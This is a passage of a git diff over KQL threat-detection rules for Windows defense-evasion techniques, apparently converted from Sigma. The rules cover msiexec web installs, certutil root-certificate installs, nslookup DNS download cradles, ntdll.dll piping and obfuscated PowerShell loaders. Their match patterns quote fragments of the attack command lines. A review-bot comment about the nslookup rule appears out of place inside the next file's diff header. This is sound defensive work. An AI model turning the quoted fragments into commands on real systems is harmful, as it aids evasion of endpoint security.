diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
index 844173d9..ad203736 100644
--- a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
+++ b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
@@ -1,12 +1,12 @@
-// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
-// Date: 2022-08-14
-// Level: high
-// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
+// Date: 2022-08-14
+// Level: high
+// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
index 085455fe..d78d366c 100644
--- a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
+++ b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
@@ -1,13 +1,13 @@
-// Title: Msiexec Quiet Installation
-// Author: frack113
-// Date: 2022-01-16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.007
-// False Positives:
-// - WindowsApps installing updates via the quiet flag
-
-DeviceProcessEvents
+// Title: Msiexec Quiet Installation
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
+// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+// False Positives:
+// - WindowsApps installing updates via the quiet flag
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or 
ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q")) and (not((((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msiexec_web_install.kql b/KQL/rules/Defense Evasion/msiexec_web_install.kql
index fc056a5b..abc7506a 100644
--- a/KQL/rules/Defense Evasion/msiexec_web_install.kql
+++ b/KQL/rules/Defense Evasion/msiexec_web_install.kql
@@ -1,12 +1,12 @@
-// Title: MsiExec Web Install
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-02-09
-// Level: medium
-// Description: Detects suspicious msiexec process starts with web addresses as parameter
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceProcessEvents
+// Title: MsiExec Web Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-09
+// Level: medium
+// Description: Detects suspicious msiexec process starts with web addresses as parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
index 2801184e..fdb921c9 100644
--- a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
+++ b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
@@ -1,13 +1,13 @@
-// Title: Msxsl.EXE Execution
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019-10-21
-// Level: medium
-// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
-// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1220
-// False Positives:
-// - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
-
-DeviceProcessEvents
+// Title: Msxsl.EXE Execution
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
+// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+// - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
index f069d3ac..bb50efd1 100644
--- a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
+++ b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
@@ -1,12 +1,12 @@
-// Title: Netsh Allow Group Policy on Microsoft Defender Firewall
-// Author: frack113
-// Date: 2022-01-09
-// Level: medium
-// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.004
-// False Positives:
-// - Legitimate administration activity
-
-DeviceProcessEvents
+// Title: Netsh Allow Group Policy on Microsoft Defender Firewall
+// Author: frack113
+// Date: 2022-01-09
+// Level: medium
+// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
index c966b8b5..3b1ea25d 100644
--- a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
+++ b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
@@ -1,11 +1,11 @@
-// Title: Network Connection Initiated By AddinUtil.EXE
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023-09-18
-// Level: high
-// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
-// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated By AddinUtil.EXE
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: high
+// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
+// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\addinutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
index efa434e8..c5279971 100644
--- a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
+++ b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
@@ -1,12 +1,12 @@
-// Title: New Capture Session Launched Via DXCap.EXE
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-26
-// Level: medium
-// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate execution of dxcap.exe by legitimate user
-
-DeviceProcessEvents
+// Title: New Capture Session Launched Via DXCap.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate execution of dxcap.exe by legitimate user
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql
index ace0035c..484f57b8 100644
--- a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql
+++ b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql
@@ -1,12 +1,12 @@
-// Title: New DLL Registered Via Odbcconf.EXE
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-22
-// Level: medium
-// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.008
-// False Positives:
-// - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.
-
-DeviceProcessEvents
+// Title: New DLL Registered Via Odbcconf.EXE
+// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql
index 7c94cc0e..db6a3359 100644
--- a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql
+++ b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql
@@ -1,10 +1,10 @@
-// Title: New File Association Using Exefile
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021-11-19
-// Level: high
-// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceRegistryEvents
+// Title: New File Association Using Exefile
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-11-19
+// Level: high
+// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\."
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql
index fcb58fe6..1209e1c5 100644
--- a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql
+++ b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql
@@ -1,13 +1,13 @@
-// Title: New Firewall Rule Added Via Netsh.EXE
-// Author: Markus Neis, Sander Wiebing
-// Date: 2019-01-29
-// Level: medium
-// Description: Detects the addition of a new rule to the Windows firewall via netsh
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246
-// False Positives:
-// - Legitimate administration activity
-// - Software installations
-
-DeviceProcessEvents
+// Title: New Firewall Rule Added Via Netsh.EXE
+// Author: Markus Neis, Sander Wiebing
+// Date: 2019-01-29
+// Level: medium
+// Description: Detects the addition of a new rule to the Windows firewall via netsh
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246
+// False Positives:
+// - Legitimate administration activity
+// - Software installations
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql
index 815bca1a..20e8ce7a 100644
--- a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql
+++ b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql
@@ -1,12 +1,12 @@
-// Title: New Process Created Via Taskmgr.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-03-13
-// Level: low
-// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: New Process Created Via Taskmgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-13
+// Level: low
+// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
index 491c2009..5a001200 100644
--- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
+++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
@@ -1,13 +1,13 @@
-// Title: New Root Certificate Installed Via CertMgr.EXE
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023-03-05
-// Level: medium
-// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
-// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1553.004
-// False Positives:
-// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
-
-DeviceProcessEvents
+// Title: New Root Certificate Installed Via CertMgr.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
index 35c79c9c..4835d8e4 100644
--- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
@@ -1,13 +1,13 @@
-// Title: New Root Certificate Installed Via Certutil.EXE
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2023-03-05
-// Level: medium
-// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
-// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1553.004
-// False Positives:
-// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
-
-DeviceProcessEvents
+// Title: New Root Certificate Installed Via Certutil.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore" or ProcessCommandLine contains "–addstore" or ProcessCommandLine contains "—addstore" or ProcessCommandLine contains "―addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/node_process_executions.kql b/KQL/rules/Defense Evasion/node_process_executions.kql
index a87cef39..0d7faa39 100644
--- a/KQL/rules/Defense Evasion/node_process_executions.kql
+++ b/KQL/rules/Defense Evasion/node_process_executions.kql
@@ -1,10 +1,10 @@
-// Title: Node Process Executions
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022-04-06
-// Level: medium
-// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007
-
-DeviceProcessEvents
+// Title: Node Process Executions
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: medium
+// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007
+
+DeviceProcessEvents
 | where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql
index 801ff407..dfd8fdbb 100644
--- a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql
+++ b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql
@@ -1,10 +1,10 @@
-// Title: Nslookup PowerShell Download Cradle - ProcessCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-05
-// Level: medium
-// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Nslookup PowerShell Download Cradle - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: medium
+// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql
index bed879da..de464966 100644
--- a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql
+++ b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql
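Review bot: On the `| where` line, `ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe"` cannot match because the original-file-name field carries only the bare file name, never a path separator, so that half of the disjunction is dead and the rule silently depends on the `FolderPath` clause alone. It should read `ProcessVersionInfoOriginalFileName =~ "nslookup.exe"`, and `FolderPath contains "\\nslookup.exe"` would be more precise as `FolderPath endswith "\\nslookup.exe"`, consistent with the other rules in this batch. Since these files are converter output, the backslash-prefixed OriginalFileName pattern is worth searching for across the rest of the generated set.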
@@ -1,10 +1,10 @@
-// Title: NtdllPipe Like Activity Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-05
-// Level: high
-// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: NtdllPipe Like Activity Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-05
+// Level: high
+// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
index 9e11b022..68f83ce2 100644
--- a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
+++ b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
@@ -1,14 +1,14 @@
-// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
-// Author: Meroujan Antonyan (vx3r)
-// Date: 2025-05-27
-// Level: high
-// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
-// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
-// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
-// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
-// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-05-27
+// Level: high
+// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
+// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
+// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
+// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
+// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(" and ProcessCommandLine contains ".Insert(" and ProcessCommandLine contains "UILevel") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql
index 13ec9462..ce369ca5 100644
--- a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql
+++ b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql
@@ -1,10 +1,10 @@
-// Title: Obfuscated PowerShell OneLiner Execution
-// Author: @Kostastsale, TheDFIRReport
-// Date: 2022-05-09
-// Level: high
-// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001
-
-DeviceProcessEvents
+// Title: Obfuscated PowerShell OneLiner Execution
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-05-09
+// Level: high
+// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http://127.0.0.1" and ProcessCommandLine contains "%{(IRM $_)}" and ProcessCommandLine contains "Invoke") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql
index d5d6c6d0..50efda01 100644
--- a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql
+++ b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql
@@ -1,12 +1,12 @@
-// Title: Odbcconf.EXE Suspicious DLL Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-22
-// Level: high
-// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.008
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Odbcconf.EXE Suspicious DLL Location
